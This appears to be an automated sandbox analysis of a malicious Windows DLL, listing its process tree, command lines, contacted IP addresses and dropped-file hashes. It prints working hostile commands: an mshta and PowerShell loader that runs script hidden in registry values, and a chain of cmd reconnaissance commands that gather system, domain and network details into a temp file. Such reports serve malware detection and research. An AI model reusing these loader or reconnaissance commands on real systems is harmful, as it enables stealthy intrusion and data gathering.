PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 5028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 5028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2876 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2876 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2876 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3020 wrote to memory of 3936 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 3936 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4668 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4668 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4668 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4668 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3020 wrote to memory of 4240 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4240 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4452 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4452 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4452 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 4452 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3020 wrote to memory of 4448 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
RO 37.120.206.71:80 37.120.206.71 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
IE 13.69.239.72:443 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/1816-130-0x0000000000000000-mapping.dmp

memory/1816-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1816-136-0x0000000000CD0000-0x0000000000CDD000-memory.dmp

memory/3932-140-0x0000000000000000-mapping.dmp

memory/3932-141-0x000001CF6D940000-0x000001CF6D962000-memory.dmp

memory/3932-142-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp

memory/516-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline

MD5 f2734214002408a7eccd2fbae5870da5
SHA1 fde6d5c4e61dff27f46f69c480155e1101397700
SHA256 552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102
SHA512 3e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5

\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/2720-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP

MD5 e250c595c30addb02ffc6984e63a7380
SHA1 b44e41b7d62b61f9b04eed3e311910f34a0ebedb
SHA256 15f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063
SHA512 8abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6

C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp

MD5 a9eead4a76288738990c8668032dd780
SHA1 ece0771b0b40abec808cd5e8dedfbebbd4345d68
SHA256 925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc
SHA512 b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb

C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll

MD5 8495c9cbe1593820014899a043577e1b
SHA1 b395a19a3262dc61ea9f3174cad05e194fcbbe57
SHA256 08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8
SHA512 035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715

memory/696-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline

MD5 340f65806e42a1b022861685812d236b
SHA1 a53ffde123a1837fe255d764e7a992ab905fb8b9
SHA256 b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7
SHA512 30b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb

\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/1932-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP

MD5 83ab673e353bc97b876da6cfc8b171d8
SHA1 4a661313af68b943f2580cdbcf76b19a89e12734
SHA256 2a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e
SHA512 a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93

C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp

MD5 860be3be01f3f3c1bb8223c4b4ebf8d5
SHA1 98662fcdbf155d942f6aec76e367f0fef5cb1f21
SHA256 51f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54
SHA512 63f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b

C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.dll

MD5 ea0f2464b104a78625ed3074b10d5b26
SHA1 871ebae4ea06340b952d4671f6cf79013808bf22
SHA256 4823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506
SHA512 82fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10

memory/3932-157-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp

memory/3932-158-0x000001CF6F4E0000-0x000001CF6F51D000-memory.dmp

memory/3448-159-0x000001E7C59B0000-0x000001E7C5A53000-memory.dmp

memory/3020-160-0x0000000007E40000-0x0000000007EE3000-memory.dmp

memory/2616-162-0x0000000000000000-mapping.dmp

memory/1860-161-0x0000000000000000-mapping.dmp

memory/3656-163-0x0000000000000000-mapping.dmp

memory/1344-164-0x0000000000000000-mapping.dmp

memory/3720-165-0x0000019D12F00000-0x0000019D12FA3000-memory.dmp

memory/2616-166-0x00000000005A6B20-0x00000000005A6B24-memory.dmp

memory/4104-167-0x00000204A5A10000-0x00000204A5AB3000-memory.dmp

memory/536-168-0x00000223FA1E0000-0x00000223FA283000-memory.dmp

memory/3020-169-0x000000000B160000-0x000000000B29B000-memory.dmp

memory/2616-170-0x0000000000A70000-0x0000000000B06000-memory.dmp

memory/5028-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/2876-176-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4020-178-0x0000000000000000-mapping.dmp

memory/3020-179-0x00000000084A0000-0x00000000085DA000-memory.dmp

memory/3936-183-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 42bfa4737502d07aa54f4c8ee04c5fef
SHA1 7198ae79a9c046de5d684acfd132b37f00f6a425
SHA256 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36
SHA512 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d

memory/4668-185-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 42bfa4737502d07aa54f4c8ee04c5fef
SHA1 7198ae79a9c046de5d684acfd132b37f00f6a425
SHA256 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36
SHA512 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d

memory/1160-187-0x0000000000000000-mapping.dmp

memory/3020-188-0x0000000007E40000-0x0000000007EE3000-memory.dmp

memory/4240-189-0x0000000000000000-mapping.dmp

memory/4452-190-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 f2ea599a2b3969ca84eef5bfcb3872f5
SHA1 ea8db863a41c24696622269c1e9a59470d81d5ae
SHA256 f4afef97443809ed08b7b279fb70ddef9e3e2ae96dbf0f0f8878d342c53ee765
SHA512 6d18d72d27153253d36c2943d01ec09fded565afb6d6094c4a7062132ad60c4ad58ccbfc035644784ed338d543325f2e3062138cafebd4e4b6281f346a03d183

memory/4388-192-0x0000000000000000-mapping.dmp

memory/4448-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 550324b3d2c3fccbf11991e605fb633a
SHA1 0e72da4bfa6e52f9b5627a825038f85135dc341a
SHA256 bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1
SHA512 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20

memory/2232-195-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 550324b3d2c3fccbf11991e605fb633a
SHA1 0e72da4bfa6e52f9b5627a825038f85135dc341a
SHA256 bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1
SHA512 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20

memory/3144-197-0x0000000000000000-mapping.dmp

memory/2728-198-0x0000000000000000-mapping.dmp

memory/3576-199-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 94b550334ec2b1b98472ead5fce8f180
SHA1 d2f658d2e49fcdc6c43b91e1dc712922f6412945
SHA256 95a7fe2794be40bd2ac401f1b64b163db7c497887cc7833c59191e69cb8a4ca1
SHA512 004cfcdf654e8160192b9181586c0ed1493c8638b77cf718f3e5419054b95db288412d98abdbfde6720e283548ad1ab3a172ad3ea33cb9f796c212e928c1d979

memory/3936-201-0x0000000000000000-mapping.dmp

memory/4472-202-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 de21ae01f00b8ae78b2d39e2055d1dc0
SHA1 397a864a9dc4f574820996dc4d32a37659d0b531
SHA256 d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937
SHA512 d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816

memory/3484-204-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 de21ae01f00b8ae78b2d39e2055d1dc0
SHA1 397a864a9dc4f574820996dc4d32a37659d0b531
SHA256 d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937
SHA512 d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816

memory/4616-206-0x0000000000000000-mapping.dmp

memory/2256-207-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 397eb325e338a7924c540b5bcd94e374
SHA1 f88da33ae78e5fd848531e462da24a9a7c57de88
SHA256 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
SHA512 f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e

memory/3516-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 397eb325e338a7924c540b5bcd94e374
SHA1 f88da33ae78e5fd848531e462da24a9a7c57de88
SHA256 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
SHA512 f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e

memory/1152-211-0x0000000000000000-mapping.dmp

memory/4456-212-0x0000000000000000-mapping.dmp

memory/2400-213-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 f1a2aa1f4f0c2e950ca2e946f24e52a7
SHA1 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0
SHA256 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed
SHA512 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f

memory/1976-215-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 f1a2aa1f4f0c2e950ca2e946f24e52a7
SHA1 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0
SHA256 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed
SHA512 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f

memory/2588-217-0x0000000000000000-mapping.dmp

memory/4276-218-0x0000000000000000-mapping.dmp

memory/4912-219-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 9bae8ae2e7f60de0d8c3f9809a365b5a
SHA1 c05309024e67723dbc40583390d9deb970208a30
SHA256 9ef11a026250169cb0eca6369809bee07b0f24c5c1933938c25f4f84eb5d0abb
SHA512 0a55a13b234f55851cfe4b49d8cbf24c50db3805aeb00a3ca8004824c045fb0a3619e8a038b849f953672e2092a3e43bc945e7902458fb0b580f41cdaeddfc0a

memory/5012-221-0x0000000000000000-mapping.dmp

memory/844-222-0x0000000000000000-mapping.dmp

memory/920-223-0x0000000000000000-mapping.dmp

memory/4036-225-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 24e087934651d6f0a5885fa46f185864
SHA1 b20946bd3d31fcd75bc758c8e659de9dafaf20eb
SHA256 b1626a5b8040ba8fbc5f15bdbde39f8e25177873df1fd2865db6949bc263af02
SHA512 f98260eb89115d6f26e03a6d866bd6bebcfb6a02dd69814f9a15e617670527556f8e7fdbc9f72ab323585169b28783a95982b929722294812ef0e4fa91ded06e

memory/1092-226-0x0000000000000000-mapping.dmp

memory/2528-227-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 eb94ae3ce4b86bff9cafe1503fbc001d
SHA1 0bc3aee0a38c82f1e6775b1428219e7460e38ace
SHA256 b037abcec90bc47921db5c251215e9cb135511d0b08ce395fd697b88d1e99f6b
SHA512 922243683bad6ef9ccb80fff75c8ff44673acd5c8f52e693c66e3e35589a12bd5ee24d875dea2759d6912a2159aa1d7086e765dd488bfef11eb531c9fe863aa2

memory/4892-229-0x0000000000000000-mapping.dmp

memory/5088-230-0x0000000000000000-mapping.dmp

memory/1980-231-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6602.bin1

MD5 a345edcdee52303ac713c76b2366a94c
SHA1 4452c95702106a78f24f701612788561e04c6407
SHA256 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d
SHA512 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a

C:\Users\Admin\AppData\Local\Temp\6602.bin

MD5 a345edcdee52303ac713c76b2366a94c
SHA1 4452c95702106a78f24f701612788561e04c6407
SHA256 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d
SHA512 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a